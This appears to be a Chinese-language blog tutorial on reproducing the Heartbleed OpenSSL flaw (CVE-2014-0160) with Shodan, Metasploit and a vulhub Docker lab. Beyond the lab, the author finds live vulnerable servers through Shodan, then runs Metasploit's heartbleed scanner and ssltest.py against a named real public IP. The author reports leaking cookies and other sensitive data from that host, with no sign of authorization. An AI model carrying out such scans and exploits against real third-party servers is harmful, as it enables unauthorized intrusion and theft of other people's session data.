心脏滴血漏洞(CVE-2014-0160)复现

准备工作

  • 使用shodan搜索相关站点
    关键词:openssl/1.0.1a
    在这里插入图片描述
  • 访问地址

https://possible.lv/tools/hb/

进行在线测试搜索到的站点,查看是否存在漏洞
心脏滴血漏洞(CVE-2014-0160)复现_第1张图片

方法一:利用Metasploit进行渗透

  1. 开启Metasploit,查找心脏滴血漏洞并利用

msfconsole
search openssl_heartbleed
use auxiliary/scanner/ssl/openssl_heartbleed

心脏滴血漏洞(CVE-2014-0160)复现_第2张图片

  1. 配置源地址和源端口,IP地址为查找到的站点,端口号设为443,并执行run命令

show options
set RHOSTS 92.154.49.106
set RPORT 443
run

在这里插入图片描述
通过结果可以看到Heartbeat response with leak,证明漏洞存在

  1. 设置verbose 为true,输出进度条记录

set VERBOSE true
exploit

心脏滴血漏洞(CVE-2014-0160)复现_第3张图片
从结果可以看出我们可以利用该漏洞获取到cookie值等敏感信息

方法二:利用docker环境复现

  1. 进入vulhub目录选择环境

cd openssl/heartbleed/

在这里插入图片描述

  1. 编译并启动环境

docker-compose build
docker-compose up -d

  1. Python2运行ssltest.py,获取敏感数据
    IP地址为查询到的站点

python ssltest.py 92.154.49.106 -p 443

心脏滴血漏洞(CVE-2014-0160)复现_第4张图片

你可能感兴趣的:(漏洞复现)